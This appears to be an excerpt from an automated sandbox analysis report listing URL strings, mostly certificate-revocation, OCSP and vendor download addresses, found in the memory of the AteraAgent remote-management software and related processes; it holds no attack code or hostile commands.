0000001A.00000002.2825307729.0000021B52A7F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526C7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B527FF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBEA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl%b
                                Source: AteraAgent.exe, 0000000C.00000002.1975925687.0000016E760AA000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB9F0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB970000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE17000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB97C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDFE000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE07000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7E7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1975422901.0000016E75DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl5
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl9
                                Source: AteraAgent.exe, 0000000C.00000002.1974508605.0000016E73A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl:
                                Source: AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlDR
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlb?iv
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/l
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1975422901.0000016E75DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlche
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277E00F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cs2.wpc.gammacdn.net
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabom_
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc
                                Source: AgentPackageSTRemote.exe, 00000023.00000002.3066742035.000001542179D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d17kmd0va0f0mp.cloudfront.net
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526C7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52843000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d25btwd9wax8gu.cloudfront.net
                                Source: AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBEB9000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.2149423855.00000167D1432000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://dl.google.com/googletalk/googletalk-setup.exe
                                Source: AgentPackageSTRemote.exe, 00000023.00000002.3066742035.000001542179D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.splashtop.com
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://download.sysinternals.com/Files/SysinternalsSuite.zip
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://download.sysinternals.com/Files/SysinternalsSuitex64.zip
                                Source: AteraAgent.exe, 00000010.00000002.2527011175.000002BEFBA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firessh.net/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firessh.net/help.html
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gig-ai-prod-weur-01-app-v4-tag.westeurope.cloudapp.azure.com
                                Source: rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://learn-powershell.net/2013/02/08/powershell-and-events-object-events/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3170057312.000002C3A46B2000.00000002.00000001.01000000.0000004E.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://mirrors.kernel.org/sourceware/cygwin/
                                Source: AgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://my.splashtop.com
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://nlog-project.org/dummynamespace/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://nlog-project.org/ws/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://nlog-project.org/ws/3
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://nlog-project.org/ws/5
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://nlog-project.org/ws/T
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://nsis.sourceforge.net/Docs/AppendixD.html
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digice
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicepD
                                Source: AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE59000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABC1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/1n8J
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7E7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D8D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7E7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                                Source: AteraAgent.exe, 0000000C.00000002.1975925687.0000016E760AA000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB9F0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE807B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB970000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE17000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB97C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80682000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802D2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDFE000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBEF2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDC0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2188999803.00000167EA688000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2189043377.00000280D39CE000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2189043377.00000280D397C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABC1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7C8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526ED000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBEF2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE07000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526ED000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                                Source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedRootG4.crth(
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF
                                Source: AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comA
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comI
                                Source: AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comQX
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comY
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
